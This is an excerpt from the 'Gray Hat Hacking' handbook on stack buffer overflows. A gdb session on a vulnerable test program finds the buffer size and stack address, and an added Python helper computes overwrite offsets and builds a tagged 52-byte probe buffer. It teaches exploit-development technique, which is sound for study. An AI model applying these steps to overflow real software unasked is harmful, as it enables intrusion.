
Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking: The Ethical Hacker's Handbook, Second Edition"

In the real world, a little more research will be required to find the location of the vulnerable buffer by looking at the disassembly and by some trial and error.
BT book $ gdb -q vuln2
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80483aa
(gdb) r
Starting program: /mnt/sda1/book/book/vuln2
Breakpoint 1, 0x080483aa in main ()
(gdb) disas main
Dump of assembler code for function main:
0x080483a4 <main+0>: push %ebp
0x080483a5 <main+1>: mov %esp,%ebp
0x080483a7 <main+3>: sub $0x18,%esp

Now that we know the size of the vulnerable buffer plus the compiler-added padding (0x18 = 24 bytes), we can calculate the location of the sixth memory address past it by adding: 24 + (6 × 4) = 48 = 0x30. Since we will place 4 bytes in that last location, the total size of the attack buffer will be 52 bytes. Next we will send a representative-size (52-byte) buffer into our vulnerable program and find the location of the beginning of the vulnerable buffer with gdb by printing the value of $esp.
(gdb) r `perl -e 'print "AAAA"x13'`Quit
Starting program: /mnt/sda1/book/book/vuln2 `perl -e 'print "AAAA"x13'`Quit
Breakpoint 1, 0x080483aa in main ()
(gdb) p $esp
$1 = (void *) 0xbffff560
(gdb)q
The program is running.
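Added here as an illustration, not code from the book: a small Python helper that takes the two gdb outputs above as constructed input, recovers the frame size from the prologue's sub $0x18,%esp and the buffer start from $esp, maps each 4-byte word past the padded buffer to its address, and builds a tagged 52-byte probe so that a register value captured at a crash identifies which word was overwritten instead of relying on trial and error. All function and constant names are my own.

```python
import re
import struct

# Constructed sample input: the two gdb outputs shown in the session above.
GDB_DISAS = """\
Dump of assembler code for function main:
0x080483a4 <main+0>: push %ebp
0x080483a5 <main+1>: mov %esp,%ebp
0x080483a7 <main+3>: sub $0x18,%esp
"""
GDB_ESP = "$1 = (void *) 0xbffff560"

def frame_size(disas):
    """Bytes reserved by the prologue's 'sub $N,%esp' (buffer plus compiler padding)."""
    m = re.search(r"sub\s+\$(0x[0-9a-fA-F]+|\d+),%esp", disas)
    if m is None:
        raise ValueError("no 'sub $N,%esp' in prologue")
    return int(m.group(1), 0)

def esp_value(gdb_line):
    """Parse the pointer printed by '(gdb) p $esp'."""
    return int(re.search(r"0x[0-9a-fA-F]+", gdb_line).group(0), 16)

def word_address(esp, size, k, word=4):
    """Address of the k-th 4-byte word past the padded buffer (k=0 saved EBP, k=1 return address)."""
    return esp + size + k * word

def probe_buffer(size, words=7, word=4):
    """Filler of size + words*4 bytes; each word past the buffer carries its own tag byte
    ('B', 'C', ...) so a register value seen at the crash tells which word it came from."""
    buf = b"A" * size
    for k in range(words):
        buf += bytes([ord("B") + k]) * word
    return buf

def word_hit(reg_value, word=4):
    """Given a 32-bit register value captured at the crash (e.g. EIP = 0x43434343), return
    the index k of the tagged word that landed there, or None if it is not one of our tags."""
    tag = struct.pack("<I", reg_value)
    if len(set(tag)) != 1 or not (ord("B") <= tag[0] < ord("B") + 26):
        return None
    return tag[0] - ord("B")

if __name__ == "__main__":
    size = frame_size(GDB_DISAS)   # 0x18 = 24
    esp = esp_value(GDB_ESP)       # 0xbffff560
    for k in range(7):
        print(f"word {k}: offset {size + k * 4:>2} -> {word_address(esp, size, k):#010x}")
    print(len(probe_buffer(size)), "byte probe")   # 52
```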

